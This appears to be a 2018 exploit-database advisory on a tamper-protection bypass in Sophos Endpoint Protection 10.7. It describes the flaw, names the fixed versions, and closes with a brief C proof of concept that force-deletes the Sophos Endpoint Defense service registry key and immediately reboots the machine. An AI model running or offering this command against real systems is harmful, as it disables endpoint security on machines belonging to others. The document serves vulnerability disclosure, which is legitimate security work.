Sophos Endpoint Protection 10.7 Tamper Protection Bypass Vulnerability

ID 1337DAY-ID-30114
Type zdt
Reporter hyp3rlinx
Modified 2018-04-04T00:00:00


Sophos Endpoint Protection version 10.7 suffers from a tamper protection bypass vulnerability.

                                            [+] Credits: John Page (aka hyp3rlinx)    


Sophos Endpoint Protection v10.7

Sophos Endpoint Protection helps secure your workstation by adding prevention, detection, and response technology on top of your operating system.
Sophos Endpoint Protection is designed for workstations running Windows and macOS. It adds exploit technique mitigations, CryptoGuard anti-ransomware,
anti-malware, web security, malicious traffic detection, and deep system cleanup.

Vulnerability Type:
Tamper Protection Bypass

CVE Reference:

Security Issue:
Sophos Endpoint Protection offers an enhanced tamper protection mechanism disallowing changes to be made to the Windows registry
by creating and setting a special registry key "SEDEnabled" as follows:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint Defense\TamperProtection\Config
Create the following registry key:

From "" documentation:
"You must enable the basic Tamper Protection feature on an endpoint in order to use the Enhanced Tamper Protection"

However, this protection mechanism can be bypassed by deleting the following registry key as it is not sufficiently protected.
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos Endpoint Defense\"

By deleting this key this bypasses the Sophos Endpoint "Enhanced Tamper Protection" once the system has been rebooted.
Attackers can then create arbitrary registry keys or edit keys and settings under the protected "tamper" protection config key.
The issue undermines the integrity of the endpoint protection as deleting this key stops the tamper protect driver from loading.

SAV OPM customers are unaffected from 10.8.1 onwards, all Central managed customers customers are unaffected. 
All SAV OPM Preview subscribers have had the fix since 2018-03-01.

Compile the below malicious POC "C" code and run on target, PC will reboot then we pwn.

gcc -o sophos-poc.exe sophos-poc.c


Even with "SEDEnabled"=dword:00000001" set in registry to prevent tampering
By hyp3rlinx **/

int main(void){
 system("reg delete \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos Endpoint Defense\"  /f");
 system("shutdown -t 0 -r -f");
return 0;

# [2018-04-09]  #